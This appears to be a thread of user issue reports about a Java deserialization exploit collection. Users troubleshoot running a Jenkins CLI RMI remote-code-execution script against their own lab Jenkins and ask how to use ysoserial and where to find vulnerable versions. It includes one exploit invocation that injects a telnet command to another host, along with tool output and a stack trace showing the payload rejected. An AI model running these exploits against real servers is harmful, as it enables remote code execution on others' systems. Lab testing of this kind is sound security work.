I have Jenkins 2.47 with nginx. I'm trying to verify the exploit using the jenkins_cli_rmi_rce.

I'm expecting to see the tcpdump output below to show the telnet attempting to connect on port 8081 (verified this by running this telnet cmd directly on appserver).

Dont think the exploit is working on my setup but I may be missing something obvious.

root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 'telnet 10.0.2.15 8081'
[] Target IP: localhost
[] Target PORT: 8080

[] Retrieving the Jenkins CLI port
[] Connecting to Jenkins CLI on localhost:38539
[] Sending headers
Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #15 from /127.0.0.1:41626
[] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="

Nothing on tcpdump
root@appserver:~# tcpdump port 8081 -i any
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes

The jenkins log shows the following output -
Jan 26, 2017 6:47:48 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException
SEVERE: A thread (TCP agent connection handler #15 with /127.0.0.1:41626/88) died unexpectedly due to an uncaught exception, this may leave your Jenkins in a bad way and is usually indicative of a bug in the code.
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
at hudson.remoting.Capability$1.resolveClass(Capability.java:137)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1817)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1711)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1982)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1533)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:420)
at hudson.remoting.Capability.read(Capability.java:140)
at hudson.remoting.ChannelBuilder.negotiate(ChannelBuilder.java:391)
at hudson.remoting.ChannelBuilder.b[+] Sent payload
uild(ChannelBuilder.java:310)
at hudson.cli.CliProtocol$Handler.runCli(CliProtocol.java:95)
at hudson.cli.CliProtocol$Handler.run(CliProtocol.java:82)
at hudson.cli.CliProtocol.handle(CliProtocol.java:58)
at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:230)

I try to build my local environment for openNMS, but searched several times there is no any information about this vulnerability. How do you choose the version you do experiment on? And which linux distribution do you use to experiment?

I am a newbie to learn web security.Fortunately，I meet this tool，but it is very difficult to some people like me.Can anyone write a note about how to use it?By the way, how to understand this :
Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
My way：java -jar ysoserial.jar

I google for the vulnerable version of websphere, but found no result. If you know where to download this vulnerable version, could you please tell me?

I see this err when trying to setup an env for this exploit. This is on a Ubuntu 14.04 with nginx. Please let me know if I'm missing something here.

root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:80 w
[*] Target IP: localhost
[*] Target PORT: 80


[*] Retrieving the Jenkins CLI port
Traceback (most recent call last):
  File "jenkins_cli_rmi_rce.py", line 62, in <module>
    cli_port = int(r.headers['X-Jenkins-CLI-Port'])
  File "/usr/local/lib/python2.7/dist-packages/requests/structures.py", line 54, in __getitem__
    return self._store[key.lower()][1]
KeyError: 'x-jenkins-cli-port'